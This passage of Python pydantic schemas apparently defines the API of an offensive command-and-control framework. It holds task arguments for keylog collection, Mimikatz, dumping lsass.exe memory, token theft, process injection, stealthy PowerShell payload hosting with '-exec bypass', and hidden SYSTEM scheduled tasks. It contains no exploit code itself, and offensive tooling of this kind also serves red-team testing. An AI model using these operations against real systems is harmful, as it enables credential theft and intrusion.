description="Remote file path (supports environment variables)",
example="%WINDIR%\\temporary.ext",
title="Path",
)
force: Optional[bool] = Field(False, description="Overwrite the target file if needed", title="Force")
class FileRemoveDirectoryArguments(Schema):
path: str = Field(
...,
description="Remote directory path (supports environment variables)",
example="C:\\temporary",
title="Path",
)
class HostPowershellArguments(Schema):
base_url: Optional[str] = Field(
"",
alias="baseUrl",
description="Base URL (default is from profile)",
example="http://mycustom.com",
title="Baseurl",
)
local: Optional[bool] = Field(True, description="Remain in the local process after load", title="Local")
process: Optional[str] = Field(
"",
description="Process to inject into (not compatible with -l/--local)",
title="Process",
)
com_object: Optional[bool] = Field(
False,
alias="comObject",
description="Use IE com object to download payload (useful for stealth/proxies)",
title="Comobject",
)
endpoint: Optional[str] = Field(
"",
description="Web endpoint path to host data",
example="/custom",
title="Endpoint",
)
class HostUnloadArguments(Schema):
pass
class HostingEncoding(str, Enum):
none = "none"
base64 = "base64"
hex = "hex"
class InfoArguments(Schema):
pass
class InjectionTechnique(str, Enum):
standard = "standard"
setthreadcontext = "setthreadcontext"
class InstanceInUpdate(Schema):
name: str = Field(..., max_length=100, title="Name")
hidden: bool = Field(..., title="Hidden")
class KerberosPurgeArguments(Schema):
pass
class KeylogGatherArguments(Schema):
    # Arguments for gathering an encrypted keylog file; empty path falls back to profile storage path.
    path: Optional[str] = Field(
        "",
        description="Encrypted keylog file location (otherwise assumed profile['keylogger']['storage_path'])",
        example="C:\\Users\\Public\\log.dat",
        title="Path",
    )
class LinkArguments(Schema):
    # Arguments for linking to a peer target.
    target: str = Field(
        ...,
        description="Target IP, hostname, or address",
        example="localhost",
        title="Target",
    )
class ManagedModuleExecuteArguments(Schema):
    # Arguments for executing a loaded managed (.NET) module method with a string input.
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    input: str = Field(
        ...,
        description="Input to managed module",
        example="run download",
        title="Input",
    )
    method: str = Field(
        ...,
        description="Fully qualified method name",
        example="Namespace.Class.Method",
        title="Method",
    )
class ManagedModuleUnloadArguments(Schema):
    # Arguments for unloading a managed module; only the framework version is configurable.
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
class MimikatzExecuteArguments(Schema):
    # Arguments for passing a command string to the Mimikatz module.
    input: str = Field(..., description="Input to Mimikatz module", example="version", title="Input")
class MimikatzLoadArguments(Schema):
    # Marker schema: the Mimikatz-load task takes no arguments.
    pass
class MinidumpArguments(Schema):
    # Arguments for writing a process minidump to a remote path.
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="%TEMP%\\proc.dmp",
        title="Path",
    )
    process: Optional[str] = Field(
        "",
        description="Process name/pid to dump (otherwise local)",
        example="lsass.exe",
        title="Process",
    )
class NativeModuleExecuteArguments(Schema):
    # Arguments for calling an exported function of a loaded native module.
    input: str = Field(..., description="Input to native module", example="version", title="Input")
    export: str = Field(
        ...,
        description="Exported function name from module (first match)",
        example="MyExport",
        title="Export",
    )
class NativeModuleUnloadArguments(Schema):
    # Marker schema: the native-module-unload task takes no arguments.
    pass
class NetworkConnectArguments(Schema):
    # Arguments for a TCP connect scan against one or more hosts.
    hosts: str = Field(
        ...,
        description="IP address(s) in single, range, or CIDR format",
        example="192.168.1.1/26",
        title="Hosts",
    )
    port: int = Field(..., description="Destination port", example="3389", title="Port")
    timeout: Optional[int] = Field(1000, description="TCP timeout in ms", example=1000, title="Timeout")
class NetworkEnumerateSessionArguments(Schema):
    # Arguments for enumerating sessions on a remote host.
    host: str = Field(..., description="Hostname or IP address", example="REMOTE-PC", title="Host")
class NetworkPingArguments(Schema):
    # Arguments for pinging a host.
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
class NetworkResolveArguments(Schema):
    # Arguments for resolving a hostname.
    host: str = Field(..., description="Hostname", example="ADAM-PC", title="Host")
class PowershellBaseArguments(Schema):
    # Common base for Powershell task argument schemas: framework version only.
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
class PowershellExecuteArguments(Schema):
    # Arguments for executing a Powershell command string.
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    input: str = Field(
        ...,
        description="Input to Powershell module",
        example="Get-Host | ft",
        title="Input",
    )
class PowershellLoadArguments(Schema):
    # Arguments for loading the Powershell module; framework version only.
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
class PowershellUnstageArguments(Schema):
    # Marker schema: the Powershell-unstage task takes no arguments.
    pass
class Process(Schema):
    # A single process entry as returned by process listing; optional fields may be absent in terse listings.
    ppid: int = Field(..., description="Parent process id", example=567, title="Ppid")
    pid: int = Field(..., description="Process id", example=432, title="Pid")
    sess: int = Field(..., description="Session id", example=1, title="Sess")
    arch: Optional[Architecture] = Field(None, description="Process architecture", example="x64")
    name: Optional[str] = Field(None, description="Process name", example="cmd.exe", title="Name")
    owner: Optional[str] = Field(None, description="Process owner", example="ACME\\John", title="Owner")
    path: Optional[str] = Field(
        None,
        description="Full process path",
        example="C:\\Windows\\System32\\cmd.exe",
        title="Path",
    )
class ProcessExecuteBaseArguments(Schema):
    # Common fields shared by the process execute/shell/powershell/start argument schemas below.
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )
class ProcessListArguments(Schema):
    # Arguments for listing processes; verbose toggles extra detail.
    verbose: Optional[bool] = Field(
        False,
        description="Provide verbose information about processes",
        example=False,
        title="Verbose",
    )
class ProcessPowershellArguments(Schema):
    # Process-execute arguments plus extra powershell.exe flags; duplicates
    # ProcessExecuteBaseArguments fields (generated code, no inheritance used).
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )
    additional_args: Optional[str] = Field(
        None,
        alias="additionalArgs",
        description="Add arguments to powershell.exe (-nop or -v2)",
        example="-nop -exec bypass",
        title="Additionalargs",
    )
class ProcessShellArguments(Schema):
    # Shell-execution arguments; same shape as ProcessExecuteBaseArguments (generated duplication).
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )
class ProcessStartArguments(Schema):
    # Process-start arguments; same shape as ProcessExecuteBaseArguments (generated duplication).
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )
class ProfileInCreate(Schema):
    # Payload for creating a profile: a name plus an arbitrary JSON data object.
    name: str = Field(..., max_length=265, title="Name")
    data: Dict[str, Any] = Field(..., title="Data")
class Protocol(str, Enum):
    # String-valued enum of transport protocols.
    smb = "smb"
    http = "http"
    https = "https"
    dns = "dns"
    icmp = "icmp"
class RttPortalAccessStatus(str, Enum):
    # String-valued enum of portal access states.
    completed = "completed"
    auth_pending = "auth_pending"
    auth_required = "auth_required"
class RegistryDeleteArguments(Schema):
    # Arguments for deleting a registry key or value; empty value deletes the key path itself.
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
class RegistryQueryArguments(Schema):
    # Arguments for querying a registry key/value; same shape as RegistryDeleteArguments.
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
class RegistryType(str, Enum):
    # String-valued enum mirroring the Windows registry value type names.
    reg_none = "REG_NONE"
    reg_sz = "REG_SZ"
    reg_expand_sz = "REG_EXPAND_SZ"
    reg_binary = "REG_BINARY"
    reg_dword = "REG_DWORD"
    reg_dword_little_endian = "REG_DWORD_LITTLE_ENDIAN"
    reg_dword_big_endian = "REG_DWORD_BIG_ENDIAN"
    reg_link = "REG_LINK"
    reg_multi_sz = "REG_MULTI_SZ"
    reg_resource_list = "REG_RESOURCE_LIST"
    reg_full_resource_descriptor = "REG_FULL_RESOURCE_DESCRIPTOR"
    reg_resource_requirements_list = "REG_RESOURCE_REQUIREMENTS_LIST"
    reg_qword = "REG_QWORD"
    reg_qword_little_endian = "REG_QWORD_LITTLE_ENDIAN"
class RegistryValue(Schema):
    # One registry value: name, type, and string-encoded data (see data description for encodings).
    name: str = Field(..., description="Value name", title="Name")
    type: RegistryType = Field(..., description="Value type")
    data: str = Field(
        ...,
        description="Value data (Base64 for REG_BINARY and '|' to separate MULTI_SZ)",
        title="Data",
    )
class RoundtripToken(Schema):
    # An expiring token plus the verify/finish URLs for a roundtrip flow.
    token: str = Field(..., title="Token")
    verify_url: str = Field(..., alias="verifyUrl", title="Verifyurl")
    finish_url: str = Field(..., alias="finishUrl", title="Finishurl")
    expires: datetime = Field(..., title="Expires")
class RouteInResponse(Schema):
    # Response model describing a route: protocol/port/pipe endpoint tied to an instance.
    id: UUID = Field(..., title="Id")
    instance_id: UUID = Field(..., alias="instanceId", title="Instanceid")
    protocol: Protocol
    port: int = Field(..., title="Port")
    pipe: str = Field(..., title="Pipe")
    timeout: int = Field(..., title="Timeout")
class ScheduledTaskCreateArguments(Schema):
    # Arguments for creating a Windows scheduled task; machine/username/password/folder
    # are the common remoting fields shared by the other ScheduledTask* schemas.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
    command: str = Field(..., description="Command binary to execute", example="cmd.exe", title="Command")
    arguments: Optional[str] = Field(
        "",
        description="Arguments to command binary",
        example="/c whoami",
        title="Arguments",
    )
    user: str = Field(
        ...,
        description="User ID for task execution (name, SID, etc)",
        example="NT AUTHORITY\\SYSTEM",
        title="User",
    )
    hidden: Optional[bool] = Field(False, description="Mark the task as hidden", example=True, title="Hidden")
    high_privilege: Optional[bool] = Field(
        False,
        alias="highPrivilege",
        description="Run with highest privileges",
        example=True,
        title="Highprivilege",
    )
class ScheduledTaskDeleteArguments(Schema):
    # Arguments for deleting a scheduled task; shares the common remoting fields.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
class ScheduledTaskQueryArguments(Schema):
    # Arguments for querying a scheduled task (or a whole folder when `task` is empty);
    # shares the common remoting fields with the other ScheduledTask* schemas.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: Optional[str] = Field(
        "",
        # Fixed typo in the user-facing schema description: "ommit" -> "omit".
        description="Task name (omit to query folder)",
        example="GoogleUpdates",
        title="Task",
    )
class ScheduledTaskStartArguments(Schema):
    # Arguments for starting a scheduled task; shares the common remoting fields.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
class ScheduledTaskState(str, Enum):
    # String-valued enum of scheduled-task states.
    unknown = "unknown"
    disabled = "disabled"
    queued = "queued"
    ready = "ready"
    running = "running"
class ScheduledTaskStopArguments(Schema):
    # Arguments for stopping a scheduled task; shares the common remoting fields.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
class SchemaModel(Schema):
    # Empty placeholder model (generated); carries no fields.
    pass
class ScreenshotArguments(Schema):
    # Arguments for a screenshot capture; quality is constrained to 1-99.
    quality: Optional[int] = Field(
        25,
        description="Capture quality level",
        example=25,
        ge=1.0,
        le=99.0,
        title="Quality",
    )
class ScriptType(str, Enum):
    # String-valued enum distinguishing client vs server scripts.
    client = "client"
    server = "server"
class SePrivilege(str, Enum):
    # String-valued enum mirroring the Windows token privilege constant names.
    se_create_token_privilege = "SeCreateTokenPrivilege"
    se_assign_primary_token_privilege = "SeAssignPrimaryTokenPrivilege"
    se_lock_memory_privilege = "SeLockMemoryPrivilege"
    se_increase_quota_privilege = "SeIncreaseQuotaPrivilege"
    se_machine_account_privilege = "SeMachineAccountPrivilege"
    se_tcb_privilege = "SeTcbPrivilege"
    se_security_privilege = "SeSecurityPrivilege"
    se_take_ownership_privilege = "SeTakeOwnershipPrivilege"
    se_load_driver_privilege = "SeLoadDriverPrivilege"
    se_system_profile_privilege = "SeSystemProfilePrivilege"
    se_systemtime_privilege = "SeSystemtimePrivilege"
    se_profile_single_process_privilege = "SeProfileSingleProcessPrivilege"
    se_increase_base_priority_privilege = "SeIncreaseBasePriorityPrivilege"
    se_create_pagefile_privilege = "SeCreatePagefilePrivilege"
    se_create_permanent_privilege = "SeCreatePermanentPrivilege"
    se_backup_privilege = "SeBackupPrivilege"
    se_restore_privilege = "SeRestorePrivilege"
    se_shutdown_privilege = "SeShutdownPrivilege"
    se_debug_privilege = "SeDebugPrivilege"
    se_audit_privilege = "SeAuditPrivilege"
    se_system_environment_privilege = "SeSystemEnvironmentPrivilege"
    se_change_notify_privilege = "SeChangeNotifyPrivilege"
    se_remote_shutdown_privilege = "SeRemoteShutdownPrivilege"
    se_undock_privilege = "SeUndockPrivilege"
    se_sync_agent_privilege = "SeSyncAgentPrivilege"
    se_enable_delegation_privilege = "SeEnableDelegationPrivilege"
    se_manage_volume_privilege = "SeManageVolumePrivilege"
    se_impersonate_privilege = "SeImpersonatePrivilege"
    se_create_global_privilege = "SeCreateGlobalPrivilege"
    se_trusted_cred_man_access_privilege = "SeTrustedCredManAccessPrivilege"
    se_relabel_privilege = "SeRelabelPrivilege"
    se_increase_working_set_privilege = "SeIncreaseWorkingSetPrivilege"
    se_time_zone_privilege = "SeTimeZonePrivilege"
    se_create_symbolic_link_privilege = "SeCreateSymbolicLinkPrivilege"
    se_delegate_session_user_impersonate_privilege = "SeDelegateSessionUserImpersonatePrivilege"
class ServerScriptStatus(str, Enum):
    # String-valued enum of server script run states.
    stopped = "stopped"
    running = "running"
    error = "error"
class ServiceCreateArguments(Schema):
    # Arguments for creating a Windows service; `machine` is the shared remoting field.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
    display_name: Optional[str] = Field(
        "",
        alias="displayName",
        description="Friendly display name",
        example="My Service",
        title="Displayname",
    )
    command: str = Field(
        ...,
        description="Command string",
        example="C:\\Windows\\service.exe",
        title="Command",
    )
class ServiceDeleteArguments(Schema):
    # Arguments for deleting a service.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceErrorControl(str, Enum):
    # String-valued enum of service error-control levels.
    error_ignore = "error_ignore"
    error_normal = "error_normal"
    error_severe = "error_severe"
    error_critical = "error_critical"
class ServiceQueryArguments(Schema):
    # Arguments for querying a service; same shape as ServiceDeleteArguments.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceStartArguments(Schema):
    # Arguments for starting a service.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceStartType(str, Enum):
    # String-valued enum of service start modes.
    boot_start = "boot_start"
    system_start = "system_start"
    auto_start = "auto_start"
    demand_start = "demand_start"
    disabled = "disabled"
class ServiceState(str, Enum):
    # String-valued enum of service run states.
    stopped = "stopped"
    start_pending = "start_pending"
    stop_pending = "stop_pending"
    running = "running"
    continue_pending = "continue_pending"
    pause_pending = "pause_pending"
    paused = "paused"
class ServiceStopArguments(Schema):
    # Arguments for stopping a service.
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceType(str, Enum):
    # String-valued enum of Windows service types.
    kernel_driver = "kernel_driver"
    file_system_driver = "file_system_driver"
    adapter = "adapter"
    recognizer_driver = "recognizer_driver"
    win32_own_process = "win32_own_process"
    win32_share_process = "win32_share_process"
    user_own_process = "user_own_process"
    user_share_process = "user_share_process"
    interactive_process = "interactive_process"
class SessionDetails(Schema):
    # A logged-on session: who, from where, and active/idle time in minutes.
    username: str = Field(..., description="Session username", example="Jason", title="Username")
    source: str = Field(..., description="Source hostname", example="SOURCE-PC", title="Source")
    active: int = Field(..., description="Active time in minutes", example=30, title="Active")
    idle: int = Field(..., description="Idle time in minutes", example=15, title="Idle")
class ShareAddArguments(Schema):
    # Arguments for mapping a UNC share, with optional credentials.
    path: str = Field(..., description="UNC path to map", example="\\\\REMOTE\\C$", title="Path")
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\John",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
class ShareDeleteArguments(Schema):
    # Arguments for removing a mapped share.
    share: str = Field(..., description="Mapped share name", example="\\\\REMOTE\\C$", title="Share")
class ShareDisplayType(str, Enum):
    # String-valued enum of network-resource display types.
    generic = "generic"
    domain = "domain"
    server = "server"
    share = "share"
    file = "file"
    group = "group"
    network = "network"
    root = "root"
    share_admin = "share_admin"
    directory = "directory"
class ShareListArguments(Schema):
    # Marker schema: the share-list task takes no arguments.
    pass
class ShareScope(str, Enum):
    # String-valued enum of network-resource enumeration scopes.
    connected = "connected"
    globalnet = "globalnet"
    remembered = "remembered"
    recent = "recent"
    context = "context"
class ShareType(str, Enum):
    # String-valued enum of share types.
    any = "any"
    disk = "disk"
    print = "print"
    reserved = "reserved"
    unknown = "unknown"
class StdioType(str, Enum):
    # String-valued enum distinguishing stdout vs stderr streams.
    out = "out"
    error = "error"
class TaskArguments(Schema):
    # Empty base schema for task arguments.
    pass
class TaskContext(str, Enum):
    # String-valued enum of task origination contexts.
    system = "system"
    user = "user"
    script = "script"
class TaskDelivery(str, Enum):
    # String-valued enum of task delivery/progress states.
    invalid = "invalid"
    queued = "queued"
    delivered = "delivered"
    in_progress = "in_progress"
    completed = "completed"
    blocked = "blocked"
class TaskErrorInfo(Schema):
    # Error details attached to failed task results: framework code/description plus OS-level pair.
    code: Optional[int] = Field(None, title="Code")
    description: Optional[str] = Field(None, title="Description")
    os_code: Optional[int] = Field(None, alias="osCode", title="Oscode")
    os_description: Optional[str] = Field(None, alias="osDescription", title="Osdescription")
class TaskInfo(Schema):
    # A queried scheduled task: path, state, last run metadata, and raw task XML.
    path: str = Field(..., title="Path")
    state: ScheduledTaskState
    last_run: str = Field(..., alias="lastRun", title="Lastrun")
    last_result: int = Field(..., alias="lastResult", title="Lastresult")
    xml: str = Field(..., title="Xml")
class TaskResults(Schema):
    # Base task-results schema; Config.extra = "allow" lets subclass/unknown result
    # fields pass through validation unchanged.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    class Config:
        extra = "allow"
class TaskStatus(str, Enum):
    # String-valued enum of task outcome statuses.
    unknown = "unknown"
    success = "success"
    failure = "failure"
    warning = "warning"
    critical = "critical"
class TicketInResponse(Schema):
    # Response model for an issued ticket with relative and absolute expiry.
    ticket: str = Field(..., title="Ticket")
    expires_in: int = Field(..., alias="expiresIn", title="Expiresin")
    expires_at: datetime = Field(..., alias="expiresAt", title="Expiresat")
class TimeFormat(str, Enum):
    # String-valued enum selecting which file timestamp to report.
    access = "access"
    create = "create"
    write = "write"
class TokenIntegrity(str, Enum):
    # String-valued enum of token integrity levels.
    untrusted = "untrusted"
    low = "low"
    medium = "medium"
    medium_plus = "medium_plus"
    high = "high"
    system = "system"
    protected = "protected"
    secure = "secure"
class TokenLogonArguments(Schema):
    # Arguments for creating a logon token from credentials; netonly/store tweak how it is applied.
    username: str = Field(
        ...,
        description="Account username (Accepts 'domain\\user' format)",
        title="Username",
    )
    password: str = Field(..., description="Account password", title="Password")
    netonly: Optional[bool] = Field(
        False,
        description="Use a NETONLY logon type to skip local credential validation",
        title="Netonly",
    )
    store: Optional[bool] = Field(
        False,
        description="Store the token for internal use and do not apply it to the current thread impersonate",
        title="Store",
    )
class TokenLogonResults(Schema):
    # Results for a token-logon task; error info only.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class TokenPrivilegesArguments(Schema):
    # Marker schema: the token-privileges task takes no arguments.
    pass
class TokenPrivilegesResults(Schema):
    # Results for a token-privileges task: error info plus the privileges that were enabled.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    privileges: Optional[List[SePrivilege]] = Field(
        [],
        description="Privileges successfully enabled for the current token",
        example=["SeDebugPrivilege", "SeShutdownPrivilege"],
    )
class TokenRevertArguments(Schema):
    # Marker schema: the token-revert task takes no arguments.
    pass
class TokenRevertResults(Schema):
    # Results for a token-revert task; error info only.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class TokenStealArguments(Schema):
    # Arguments for duplicating a token from another process.
    process: str = Field(
        ...,
        description="Target process (name or id) for performing token duplication",
        title="Process",
    )
class TokenStealResults(Schema):
    # Results for a token-steal task; error info only.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class Tool(str, Enum):
    # String-valued enum of tool identifiers.
    slingshot = "slingshot"
    throwback = "throwback"
    downlink = "downlink"
class TransactionInResponse(Schema):
    # Response model for a recorded transaction: tool/protocol, endpoints, and free-form details.
    id: UUID = Field(..., title="Id")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    tool: Tool
    protocol: Protocol
    source: Optional[str] = Field(None, max_length=256, title="Source")
    destination: Optional[str] = Field(None, max_length=256, title="Destination")
    details: Optional[Dict[str, Any]] = Field(None, title="Details")
    instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")
class UserInChangePassword(Schema):
    # Payload for a password-change request.
    old_password: str = Field(..., alias="oldPassword", max_length=100, title="Oldpassword")
    new_password: str = Field(..., alias="newPassword", max_length=100, title="Newpassword")
class UserRole(str, Enum):
    # String-valued enum of user roles.
    admin = "admin"
    operator = "operator"
    observer = "observer"
class ValidationError(Schema):
    # Standard validation-error item: field location path, message, and error type.
    loc: List[str] = Field(..., title="Location")
    msg: str = Field(..., title="Message")
    type: str = Field(..., title="Error Type")
class WmiInstanceCallArguments(Schema):
    # Arguments for invoking a method on WMI instances selected by a WQL filter;
    # machine/namespace/username/password/authority are the common WMI connection fields.
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    filter: str = Field(
        ...,
        description="WQL filter string",
        example="Select * from Win32_OperatingSystem",
        title="Filter",
    )
    method: str = Field(..., description="Method name", example="Create", title="Method")
    parameters: Dict[str, Any] = Field(
        ...,
        description="Method parameters",
        example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
        title="Parameters",
    )
class WmiInstanceCallResults(Schema):
    # Results for a WMI instance method call: error info plus a free-form result object.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[Dict[str, Any]] = Field(
        {},
        description="Wmi results",
        example={
            "BootDevice": "\\Device\\HarddiskVolume5",
            "BuildNumber": 17134,
            "BuildType": "Multiprocessor Free",
            "Caption": "Microsoft Windows 10 Pro",
            "CodeSet": 1252,
        },
        title="Results",
    )
class WmiProcessCreateArguments(Schema):
    # Arguments for launching a process via WMI; shares the common WMI connection fields.
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    command: str = Field(
        ...,
        description="Command line string",
        example="C:\\Windows\\System32\\cmd.exe /C ipconfig",
        title="Command",
    )
class WmiProcessCreateResults(Schema):
    # Results for a WMI process-create call: error info plus a free-form result object.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[Dict[str, Any]] = Field(
        {},
        description="Wmi results",
        example={
            "BootDevice": "\\Device\\HarddiskVolume5",
            "BuildNumber": 17134,
            "BuildType": "Multiprocessor Free",
            "Caption": "Microsoft Windows 10 Pro",
            "CodeSet": 1252,
        },
        title="Results",
    )
class WmiQueryArguments(Schema):
    # Arguments for running a WQL query; shares the common WMI connection fields.
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
